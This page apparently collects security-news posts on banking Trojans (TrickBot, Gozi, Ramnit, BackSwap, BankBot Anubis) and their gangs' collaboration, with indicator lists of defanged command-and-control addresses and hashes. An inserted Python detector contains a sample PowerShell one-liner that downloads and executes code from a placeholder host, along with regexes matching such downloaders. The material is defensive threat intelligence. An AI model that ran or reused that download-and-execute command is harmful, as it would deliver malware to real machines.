Banking Trojan

The Business of Organized Cybercrime: Rising Intergang Collaboration in 2018

Banking Trojans and the gangs that operate them continue to plague banks, individuals and organizations with fraudulent transactions facilitated by malware and social engineering schemes. At last check, cybercrime cost the global economy more than $600 billion in 2017, and forecasts for 2018 predicted $1.5 trillion in losses.

No matter how you turn these numbers, they are a burden that keeps growing and encouraging a rife, complex industry of online crime.

Going Behind the Numbers of the ‘IBM X-Force Threat Intelligence Index’

Every year, increasingly organized cybercrime gangs shuffle their tactics, techniques and procedures (TTPs) to evade security controls on the micro level and law enforcement on the macro level. Behind each malware named on the top 10 chart below, codes are distributed and operated differently and focus on different parts of the globe. The chart is populated by organized cybercrime gangs that have ties to yet other cybercrime gangs, each doing its part to feed the perpetual supply chain of a digital financial crime economy.

In cybercrime, it can be said that the more things change, the more things stay the same. In 2018, however, I must admit I was finally surprised when two malware gangs that did not appear connected at first began openly collaborating. It thus became clearer than ever that the banking Trojan arena is dominated by groups from the same part of the world, by people who know each other and collaborate to orchestrate high-volume wire fraud.

To learn more about the malware that shaped 2018, let’s begin by looking at the top constituents of the gang-owned Trojan chart and drill down on information gathered by IBM Security for the top three.


Figure 1: Top 10 chart of the most active banking Trojan families in 2018 (source: IBM X-Force)

1. TrickBot

TrickBot, a banking Trojan operated by a Russia-based threat group, was one of the most aggressive Trojans of 2018. It targets banks across the globe with URL-heavy configurations that often include a large number of targeted bank brands.

TrickBot’s operators focus on business banking and high-value accounts that are held with private banking and wealth management firms, but they also diversified in 2018 to include various e-commerce and cryptocurrency exchange platforms on their target lists.

According to IBM X-Force data that was gathered since TrickBot’s rise, no other financial Trojan is as consistently active in terms of infection campaigns and deployment of redirection attacks, indicating that its operators have ample resources and connections to develop and operate the malware in different parts of the world. Despite this overall capability, X-Force saw TrickBot sharpening its focus in 2018 and targeting a handful of countries in each campaign, keeping major economies such as the U.K. and the U.S. on almost every target list.

Intergang Collaboration With IcedID

Some of the trends in TrickBot’s activity in 2018 included collaboration with another banking Trojan, IcedID, which IBM X-Force discovered in September 2017, as well as operating the Ryuk ransomware, a subset of TrickBot’s botnet monetization strategy. These highlight a larger trend of intergang collaboration among Trojan operators striving to generate larger profits in spite of growing security control sophistication.

At first, TrickBot and IcedID appeared unrelated. But about eight months into IcedID’s existence, signs of a link between the two became apparent. In May 2018, X-Force researchers observed TrickBot dropping IcedID, whereas it had previously been dropped primarily by the Emotet Trojan, the same distributor that also drops TrickBot in different campaigns.

By August 2018, our researchers noted that IcedID had been upgraded to behave in a similar way to the TrickBot Trojan in terms of its deployment. The binary file was modified to become smaller and no longer featured embedded modules. The malware’s plugins were being fetched and loaded on demand after the Trojan was installed on infected devices. These changes made IcedID stealthier, modular and more similar to TrickBot.

In addition to its increased stealth level, IcedID also started encrypting its binary file content and obfuscating the file names associated with its deployment on the endpoint. Also similar to TrickBot are IcedID’s event objects, which coordinate multiple threads of execution in Windows-based operating systems. IcedID began using named events to synchronize the execution between its core binary and the plugins selected for loading. When a plugin was called upon, it was fetched by its ID number from the attacker’s server and, when loaded, assigned a unique ID.

Although malware authors do sometimes copy from one another, our research indicates these modifications were not coincidental. Even if we only looked at the fact that TrickBot and IcedID fetch one another into infected devices, that would be indication enough that these Trojans are operated by teams that work together.

Longtime Partners?

Ties between TrickBot and IcedID may have started years ago in a collaboration designed to help both groups maximize their illicit operations and profits. During the six-year activity phase of the Neverquest (aka Catch or Vawtrak) Trojan, it collaborated with the Dyre group to deliver Dyre malware to devices already infected with Neverquest.

The original Dyre group partly disbanded in late 2015, followed by the rise of TrickBot, which is believed to be the successor to Dyre. Neverquest halted operations following the arrest of one of its key members in 2016, after which the IcedID Trojan appeared. With the two featuring advanced capabilities and evident cybercrime connections with other gangs, their current-day collaboration likely started years ago.

The TrickBot-Ryuk Connection

Another TrickBot trend that started in 2018 is a connection with ransomware. Reminiscent of the Dridex Trojan’s links to the Locky and then BitPaymer ransomware, TrickBot began dropping ransomware called Ryuk. Unlike wide-cast nets that spread ransomware to as many email recipients as possible, Ryuk, like BitPaymer, is spread in targeted campaigns where attackers go through the typical advanced persistent threat (APT) kill chain and manually breach the network.

Ryuk attackers often go through reconnaissance stages, looking for valuable data to hijack. The goal: Infect established organizations with Ryuk and then demand large sums in ransom payments that average hundreds of thousands of dollars each.


Figure 2: Ryuk campaigns — a four-step routine to drop three different Trojans to target devices (source: IBM X-Force)

Upon investigating Ryuk’s code, it quickly became apparent that this ransomware was not entirely new. Ryuk closely resembles the Hermes ransomware that was linked with malicious activity by a nation-state-sponsored group called Lazarus (aka Hidden Cobra).

Is Ryuk connected to Hermes? That’s one possibility. It could also be that some Lazarus members collaborate with banking Trojan operators through cross-border partnerships to steal and launder large amounts of cybercrime money via Eastern Europe and Asia, or that someone with access to the Hermes code reused it to create Ryuk.

Whatever the source of Ryuk, it shows that TrickBot’s operators are diversifying their nefarious activity, continuing to focus heavily on the business sector and launching targeted attacks that press organizations to pay.


Figure 3: Collaboration between major malware gangs (source: IBM X-Force)

TrickBot TTPs and Evolution

In terms of its TTPs, TrickBot’s operators focus their efforts on businesses and, therefore, opt for distribution through booby-trapped productivity files and fake bank websites. After infection, TrickBot modules allow it to spread laterally in compromised networks and infect additional users.

TrickBot continues to use both server-side injections deployed on the fly from its attack server and redirection attacks hosted on its servers to hijack users and present them with a fake replica of their bank’s website.

In 2018, TrickBot’s developers added three new functions to the malware, facilitating the theft of Remote Desktop Protocol (RDP) credentials, Virtual Network Computing (VNC) credentials and PuTTY open-source terminal emulator credentials. It steals Windows system reliability and performance data and features a new mechanism for storing its configuration and elliptic curve cryptography (ECC) public keys.

The TrickBot botnet is supported by what’s considered a mature infrastructure, where some campaigns featured 2,458 unique command-and-control (C&C) IP addresses used in 493 main configuration releases across 276 versions — all in one week.

X-Force expects to see TrickBot maintain its position on the global malware chart unless it is interrupted by law enforcement in 2019.

2. Gozi

Gozi (aka Ursnif) has been highly active in the wild for more than a decade now, a rare occurrence in the cybercrime arena. The malware was first discovered in 2007, when it was operated by a closed group of developers and cybercriminals. At the time, it was used to target online banking users mostly in English-speaking countries.

Throughout the years, Gozi has gone through almost every phase a banking Trojan can go through. Its code was leaked in 2010, giving rise to other Trojans, such as Neverquest, that also dominated the cybercrime charts for years after. It was used in the Gozi-Prinimalka ordeal in 2012 and, in 2013, was fitted with a master boot record (MBR) rootkit to create high persistence through a computer’s MBR.

In 2016, X-Force reported on the rise of the GozNym hybrid, a two-headed beast spawned from the Nymaim malware and embedded with the Gozi financial fraud module. Starting in 2017, X-Force researchers reported that a new variation of Gozi was being tested in Australia: Gozi v3. The malware was based on the same code as the original Gozi ISFB but featured some modifications at the code injection level and in attack tactics.

In 2018, Gozi v2 was the second-most active Trojan in the wild, working across the globe and in Japan. V2 is operated separately from the v3 version that continues to target banks in the Australia-New Zealand region. The malware is operated in a cybercrime-as-a-service model that allows different cybercriminals to use the botnet to conduct fraud.

To reach new victims, Gozi is distributed in document and spreadsheet attachments that prompt the user to enable macros. In recent campaigns, when the user complies, the macro runs the WMI Provider Host process (wmiprvse) to execute a malicious PowerShell script. The script is designed to fetch the payload and uses string concatenation to evade detection.
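Detection logic for the delivery chain described in this paragraph (Office macro, then the WMI Provider Host process, then a PowerShell downloader that assembles its strings by concatenation), as an added example that is not code from the article or from IBM X-Force. The record layout, the sample process-creation events and the placeholder domain are constructed for the example; the only PowerShell and .NET names used are real ones.

```python
"""Score process-creation telemetry for the macro -> wmiprvse.exe -> PowerShell
chain. Added example; the Event layout and SAMPLE_EVENTS are constructed."""
import re
from collections import namedtuple
from ntpath import basename

Event = namedtuple("Event", "event_id parent_image image command_line")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"

# Constructed sample telemetry. Event 2 models the chain from the article;
# "payload.example" is a placeholder domain, not a real indicator.
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\explorer.exe", PS,
          r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    Event(2, WMIPRVSE, PS,
          "powershell -w hidden -ep bypass -c \"$u='ht'+'tp://'+'payload.'+'example/'+'g.php';"
          "IEX (New-Object Net.WebClient).DownloadString($u)\""),
    Event(3, WMIPRVSE, r"C:\Windows\System32\cmd.exe", "cmd.exe /c ipconfig /all"),
    Event(4, PS, PS, 'powershell.exe -c "Get-Process"'),
]

# A quoted fragment followed by '+' and another quote: the 'ht'+'tp' style of
# building a URL or cmdlet name piecewise so no single string is recognizable.
CONCAT_RE = re.compile(r"""(['"])[^'"]*\1\s*\+\s*(?=['"])""")
# Cues that the script fetches or evaluates remote code (real PowerShell/.NET names).
FETCH_EXEC_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|-enc(odedcommand)?\b", re.I)
# Console-hiding / policy-bypass switches; PowerShell accepts unambiguous prefixes.
STEALTH_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass", re.I)


def count_concat_fragments(command_line):
    """Number of quoted fragments glued together with '+' in the command line."""
    return len(CONCAT_RE.findall(command_line))


def analyze(event):
    """Score one process-creation event; returns event_id, score and the reasons."""
    reasons = []
    child = basename(event.image).lower()
    parent = basename(event.parent_image).lower()
    cmd = event.command_line
    if child == "powershell.exe":
        if parent == "wmiprvse.exe":          # the macro -> WMI -> PowerShell pivot
            reasons.append(("wmi_spawned_powershell", 3))
        if count_concat_fragments(cmd) >= 3:  # piecewise string assembly
            reasons.append(("string_concatenation", 2))
        if FETCH_EXEC_RE.search(cmd):
            reasons.append(("remote_fetch_or_eval", 2))
        if STEALTH_RE.search(cmd):
            reasons.append(("hidden_or_bypass_switches", 1))
    return {"event_id": event.event_id,
            "score": sum(weight for _, weight in reasons),
            "reasons": [name for name, _ in reasons]}


def detect(events, threshold=4):
    """Return the event_ids whose score meets the alert threshold."""
    return [r["event_id"] for r in map(analyze, events) if r["score"] >= threshold]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze(ev))
    print("alerts:", detect(SAMPLE_EVENTS))
```

Event 3 shows why the parent/child pair alone is a weak signal: wmiprvse.exe legitimately spawns processes for WMI consumers, so the command-line cues carry the rest of the weight.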

Recently, in the case of attack schemes against banks in Europe, Gozi delivered custom-tailored client-side code for each targeted bank brand users accessed, likening its tactics to redirection attacks in which each brand is targeted in a specific way.

Gozi’s distributors use malicious websites to host their resources but check the target device’s Geo IP to reduce the potential of exposure. If either Russian or Chinese keyboard settings are detected during its installation, the deployment ends.

This malware has been part of the top-most constituents of the global malware chart for the past five years, and X-Force expects to see this longtime staple of the organized cybercrime arena maintain its position on the chart in 2019.

3. Ramnit

Ramnit is a prolific banking Trojan that has been active in the wild since 2010. Ramnit started out as a self-replicating worm, leveraging removable drives and network shares to spread to new endpoints. As the project evolved, Ramnit morphed into a modular banking Trojan and started spreading via popular exploit kits such as Angler and RIG.

Although it was one of the most prominent Trojans between 2011 and 2014, Ramnit was targeted by law enforcement in 2015. While it was one of the only botnets to ever survive a coordinated disruption, its operators have not returned to the same level of activity since. In recent years, Ramnit has been an on-again-off-again operation, seeing long lulls in its cybercrime activity and narrowing its attack turf over time to focus mostly on the U.K., Canada and Japan.

2018: Reemergence and Intergang Collaboration

In 2018, the Ramnit Trojan returned to the cybercrime arena with revamped code and a new partner, a proxy malware known as Ngioweb. Ramnit’s developer modified its financial module to enhance its capabilities and changed the internal module’s name from “Demetra” to “Camellia.”

Ramnit’s 2018 comeback resulted in a reported infection of more than 100,000 devices within the span of two months, as part of an operation code-named “Black.” In this campaign, Ramnit went back to its worm roots and was used as a first-stage infection in a kill chain designed to amass a large proxy botnet for Ngioweb.

How good was this new partnership for Ramnit? We can only assume that it was used to create a massive proxy botnet that would resemble the Gameover Zeus botnet in its architecture. The Black campaign was short-lived, and by the end of 2018, Ramnit was linked with Emotet, Dridex and BitPaymer for using the same dropper as those Trojans and being used itself as a dropper for Dridex.

Configuration and code comments show that Ramnit is probably being developed by new team members. Configuration injects were rewritten in the Lua programming language and, in many cases, came bugged or unsophisticated. This was not the case for this malware in past years.

For its deployment routine, Ramnit began leveraging code that relies on PowerShell scripts in what’s known as reflective PE injection. Its modules are not pulled from a remote server but come packed with the core malware, and its reliance on a domain generation algorithm (DGA) has been modified to include hardcoded domains.

Will we continue to see Ramnit in 2019? X-Force researchers expect to see the same activity pattern for this malware with its come-and-go nature in Japan and Europe. Ramnit will likely drop from its current rank on the global Trojan chart and be overtaken by IcedID and newcomers like BackSwap and DanaBot.

Threat Landscape Staples

Banking Trojans have been a burdensome part of the cybercrime threat landscape for more than a decade now. The past five years have shown us that this breed of attackers is only becoming more sophisticated over time, combining technical knowledge with advanced social engineering to focus schemes on the victims that can yield the biggest profits: businesses, cryptocurrency and high-value individuals.

While previous years saw gangs operate as adversaries, occupy different turfs and even attack each other’s malware, our research from 2018 connected the major cybercrime gangs together in explicit collaboration. This trend is a negative sign that highlights how botnet operators join forces, revealing the resilience factor in these nefarious operations.

While it can be hard to detect this type of evolving malware, it’s possible to stop banking Trojans before they make it into your device or your organization. Proper security controls and user education, as well as planned incident response, can help keep this threat at bay and contain its detrimental effects if ever an account is taken over and robbed by highly experienced criminals.

To learn more about the top security threats of 2018 and what 2019 may have in store, download the “IBM X-Force Threat Intelligence Index.” Check out page 30 in the report for our expert team’s tips on mitigating threats and increasing preparedness for a possible breach.


The post The Business of Organized Cybercrime: Rising Intergang Collaboration in 2018 appeared first on Security Intelligence.

Author: Limor Kessem


A Scary Evolution & Alliance of TrickBot, Emotet and Ryuk Ransomware Attack

Ryuk first appeared in August 2018, and while not incredibly active across the globe, at least three organizations were hit with Ryuk infections over the course of the first two months of its operations, landing the attackers about $640,000 in ransom for their efforts. According to CrowdStrike analysis from late last week, Grim Spider has […]

The post A Scary Evolution & Alliance of TrickBot, Emotet and Ryuk Ransomware Attack appeared first on GBHackers On Security.


BackSwap Malware Now Targets Six Banks in Spain

IBM X-Force researchers analyzed the activity of a relatively new banking Trojan known as BackSwap. BackSwap emerged in March 2018 and, until recently, had only targeted Polish banks. The malware’s target list now features six major banks in Spain.

According to X-Force analysis, BackSwap is its own malware project, but it is based on features that existed within the Tinba Trojan. The malware’s operators keep the code as their own project; in that sense, it is considered gang-owned and not commercial malware.

A Twist in the Tale

Overall, BackSwap is no more sophisticated than any other active banking Trojan. Its highlight is its webinjection mechanism. Instead of using the more common method of hooking browser functions, then creating different versions for each architecture, BackSwap injects JavaScript into the address bar.

By simulating user input to access the browser’s address bar and inserting the malicious script directly there, BackSwap can execute the script using JavaScript protocol URLs and bypass protections of both the browser and the bank’s third-party security controls.

In terms of what BackSwap does with the injections, this is where the novelty ends. Just as malware such as Zeus has been doing for over a decade, BackSwap uses malicious scripts to modify what victims see on their bank’s website in classic man-in-the-browser (MitB) style:

  • Scripts wait for a minimum amount of data to be transferred before replacing the destination account number.
  • Scripts inject mule account numbers on the fly via MitB.
  • Scripts hide the mule account number that the money will go to and instead present the original destination account the victim entered.

BackSwap’s Fraud Method

The likely fraud scenario based on BackSwap’s capabilities is in-session fraud automated by MitB malware scripts. The malware’s scripts wait for the user to go to a page where a transaction is to take place. When the victim initiates activity that’s interesting to the attacker, such as adding a payee or starting a money transfer, the malware replaces the destination account with a mule account number.


Figure 1: The BackSwap function responsible for account number replacement

Using MitB scripts to alter transaction details sent to the bank is not a new method. What’s new here is the way BackSwap implements it to circumvent third-party security on the bank’s website. This method can be more successful with banks that don’t require two-factor authentication (2FA) or out-of-band transaction authorization (OOBA) from customers moving money to other accounts.

Malware Spam and Then Some

BackSwap is most often delivered to users via malware spam, concealed in a productivity file attachment, such as a Microsoft Word document, or bundled inside other programs. BackSwap favors popular freeware or open source programs and plants its code in the initialization phase of the program. When run during an early stage of the program’s execution, the code replaces the installation routine with malicious instructions that execute BackSwap instead. One interesting choice was Ollydbg.exe, a program often used by malware researchers.

Testing Attack Turfs

The malware’s attack scope has thus far been limited to a few banks in Poland and some banks in Spain, specifically targeting personal banking.

The limited number of banks in each country so far may suggest that BackSwap is still in testing. Our research team expects to see more testing in other geographies in the coming weeks, and possibly a wider scope of attack for this Trojan in the fourth quarter of 2018.

Will we see BackSwap on the top 10 list of financial malware in 2019? IBM X-Force will keep updating its information on BackSwap via the X-Force Exchange.


Figure 2: Top most prevalent financial malware families (2018 YTD)

Indicators of Compromise (IoCs)

Command-and-control (C&C) server IPs:

  • hxxps://5[.]61[.]47[.]74/batya/give.php
  • hxxps://103[.]242[.]117[.]248/batya/give.php
  • hxxps://mta116[.]megaonline[.]in
  • hxxps://czcmail[.]com (IP: 119[.]23[.]128[.]176)

Recent sample MD5s:

  • 180721A8551FBBCD763C320E7034E36C (WinGraph32.exe)
  • F44D28F852A99821B681C3EAF044C8D3 (OllyDbg.exe)


The post BackSwap Malware Now Targets Six Banks in Spain appeared first on Security Intelligence.

Author: Limor Kessem


Dangerous Android Malware that Steals Banking Credentials, Call Forwarding, Keylogging, and Ransomware Activities


A new Android malware contains the functionalities of a banking Trojan, call forwarding, audio recording, keylogging and ransomware activities. The malware targeted popular banking apps such as HFC, ICICI, SBI and Axis Bank, as well as other e-wallets. The malware operator needs more user interaction for the attack to succeed; it continues to force the users in […]

The post Dangerous Android Malware that Steals Banking Credentials, Call Forwarding, Keylogging, and Ransomware Activities appeared first on GBHackers On Security.


Anubis Strikes Again: Mobile Malware Continues to Plague Users in Official App Stores

IBM X-Force mobile malware researchers have observed several developers actively uploading Android malware downloaders to the Google Play Store.

Following ongoing campaigns against Google Play, our research team has been monitoring banking malware activity in official app stores. The team recently reported that downloader apps in the store are being used as the first step in an infection routine that fetches the Marcher (aka Marcher ExoBot) and BankBot Anubis mobile banking Trojans. Users who unknowingly install the app on their devices are subsequently infected. Cybercriminals use these banking Trojans to facilitate financial fraud by stealing login credentials to banking apps, e-wallets and payment cards.

Starting in June, our team discovered a number of new malware downloader samples that infect users with BankBot Anubis (aka Go_P00t). The campaign features at least 10 malicious downloaders disguised as various applications, all of which fetch mobile banking Trojans that run on Android-based devices. While the number of downloaders may seem modest, each of those apps can fetch more than 1,000 samples from the criminal’s command-and-control (C&C) servers.

Finding new downloaders in the app store in connection with the BankBot Anubis malware could suggest that:

  • A given malware distributor/cybercrime faction has shifted from using Marcher to distributing BankBot Anubis; or
  • The threat actors distributing the malware on Google Play are offering their “expertise” as a service, spreading malware downloaders for different cybercrime factions that use mobile Trojans to facilitate financial fraud — aka “downloader-as-a-service.”

Such cybercrime services are common in the fraud and malware black markets. They entail a proven ability to infiltrate Google Play and plant malicious downloaders under the guise of benign-looking apps. These services can likely maintain the downloader’s C&C servers long enough to generate a steady stream of new infections, suggesting the thought-out operational security and know-how characteristic of organized cybercrime groups.


An Era of Mobile Malware Downloaders

As app store operators layer security to stymie the efforts of malicious developers, black-hat app distributors find ways to sidestep them. To circumvent ever-evolving app store defenses, mobile malware distributors rely on a strategy from the PC malware realms: Instead of uploading the actual malware to the store, which can result in sampling and detection at a very early stage in the distribution chain, they upload a downloader that may seem rather innocuous compared to actual malware.

In general, a downloader app is more likely to survive security checks and recurring scans, and once it lands on a user’s device, it can fetch the intended malware app. As the Chinese general Sun Tzu wrote in “The Art of War,” “The greatest victory is that which requires no battle.”

Sample Downloader Campaign From Current Analyses

In the current campaign, according to X-Force researchers, the downloader apps target Turkish-speaking users. They differ in type and visual style — from online shopping to financial services and even an automotive app — and are designed to look legitimate and enticing to users.


Figure 1: Examples of malware downloader apps found on Google Play.

The variety of apps and styles indicates a large investment of resources on the part of the campaign’s operators, suggesting that a cybercrime service, rather than a single cybercrime faction, is likely responsible.

The downloaders themselves are rather stealthy, and VirusTotal missed all but one of the samples. The one that was found had zero detections by antivirus engines.


Figure 2: No detection rates on malicious downloaders.

In this campaign, the malicious downloader apps X-Force detected have the same code base as three apps that ThreatFabric reported in January 2018. The following characteristics show the similarity:


Figure 3: Code from sample downloader reported by ThreatFabric in January 2018.


Figure 4: Code from sample downloader discovered by X-Force in June 2018.

The resemblance is even more striking in the figure below. By removing all the key instances (**pE2**) from the string, we produced the same string from the January sample:


Figure 5: The code bases are very similar, suggesting that the same developer produced both apps.

With 10 downloaders at this point, the campaign appears to be scaling up.

Over time, we’ve seen the code evolve. As time went by between downloader versions, the developers added a simple obfuscation and expanded the downloader capabilities. The code was also altered slightly to avoid detection by Google Play’s security controls.

According to X-Force’s analysis, these changes suggest that the downloader app is being maintained on an ongoing basis — another sign that it is a commodity offered to cybercriminals or a specific group that’s focused on defrauding Turkish mobile banking users.

Anubis Masquerades as Google Protect

After a successful installation of the malicious downloader, the app fetches BankBot Anubis from one of its C&C servers. The BankBot Anubis malware then masquerades as an app called “Google Protect” and prompts the user to grant it accessibility rights.


Figure 6: The app’s name in Turkish

Figure 7: Malware asking for accessibility to keylog user credentials.

Why ask for accessibility? BankBot Anubis uses Android’s Accessibility services to perform keylogging as a way to obtain the infected user’s credentials when he or she accesses a targeted mobile banking app. In most Android banking Trojans, the malware launches a fake overlay screen when the user accesses a target app. The user then taps his or her account credentials into the fake overlay, which allows the malware to steal the data. BankBot Anubis streamlines this process.

By keylogging the user’s login information, the attacker can steal credentials from any app while avoiding the need to create custom overlays for each target. This malware is also able to take screen captures of the user’s screen, which it likely uses to steal credentials since the keyboard strokes are visible. These features are staples of PC banking malware and are evolving in Android malware as well.

The downloader apps in this particular campaign were designed to address Turkish users. With different botnets and configurations, BankBot Anubis itself also targets users in the following countries:

  • Australia
  • Austria
  • Azerbaijan
  • Belarus
  • Brazil
  • Canada
  • China
  • Czech Republic
  • France
  • Georgia
  • Germany
  • Hong Kong
  • India
  • Ireland
  • Israel
  • Japan
  • Kazakhstan
  • Luxembourg
  • Morocco
  • Netherlands
  • New Zealand
  • Oman
  • Poland
  • Russia
  • Scotland
  • Slovakia
  • Spain
  • Taiwan
  • Turkey
  • U.K.
  • U.S.

While there were 10 downloader apps in the Google Play Store at the time of this writing, the campaign is rather hefty. X-Force estimated the magnitude of campaigns on Google Play by the number of downloads, as well as the number and variety of payloads found. In one case, the researchers fetched more than 1,000 new samples of BankBot Anubis from just one C&C server. Each sample has a different MD5 signature, few of which were documented by any antivirus engine when tested against VirusTotal.

Official App Stores: A Fraudster’s Holy Grail

When it comes to maximizing the results of infection campaigns, mobile malware operators consider official app stores to be the holy grail. Getting a malicious app into an official store yields greater exposure to more potential victims, a cheap distribution channel and user trust. Moreover, malware apps that have already made it into an official store are more likely to fly under the radar of security controls for longer than those hosted on hijacked sites or rogue servers. IBM X-Force reports malicious apps to the official stores to have them removed before more users can be affected.

Malicious apps are a blight that both store operators and developers work hard to limit. Still, it is a recurring problem: In 2017, X-Force mobile researchers reported numerous occasions on which financial malware had sneaked into the Google Play Store, with the BankBot Android malware family leading the pack. The trend continues to escalate.

X-Force researchers suspect that the cybercrime services spreading mobile Trojans have mastered the official app store as a malware campaign channel and may be monetizing it. While such cybercrime services are rather popular with PC malware distributors, their rise in the mobile malware realm is an escalating risk factor that users and organizations should be aware of.

To learn more about keeping devices safe from mobile malware, read our mobile malware mitigation tips.


The post Anubis Strikes Again: Mobile Malware Continues to Plague Users in Official App Stores appeared first on Security Intelligence.

Author: Shachar Gritzman


A New Variant of Ursnif Banking Trojan Distributed Through Malicious Microsoft Word Documents


A new, improved version of the infamous Ursnif banking Trojan leverages Necurs botnet infrastructure to target Italian companies. The malware primarily targets the financial sector and was first detected in 2009. CSE Cybsec ZLab researchers spotted the new campaign, active from 6th June, which hits Italian companies with a malicious Microsoft Word […]

The post A New Variant of Ursnif Banking Trojan Distributed Through Malicious Microsoft Word Documents appeared first on GBHackers On Security.


Banking Malware posed as a Popular Social Media App to Steal Financial Data From Online Banking Systems

Two newly discovered Android banking Trojans posed as popular social media and banking apps to steal victims’ financial information from online banking and payment systems. Android banking Trojans mainly target the financial sector, such as banks and other financial institutions, compromising them to steal sensitive information such as usernames, passwords and credit card data. […]

The post Banking Malware posed as a Popular Social Media App to Steal Financial Data From Online Banking Systems appeared first on GBHackers On Security.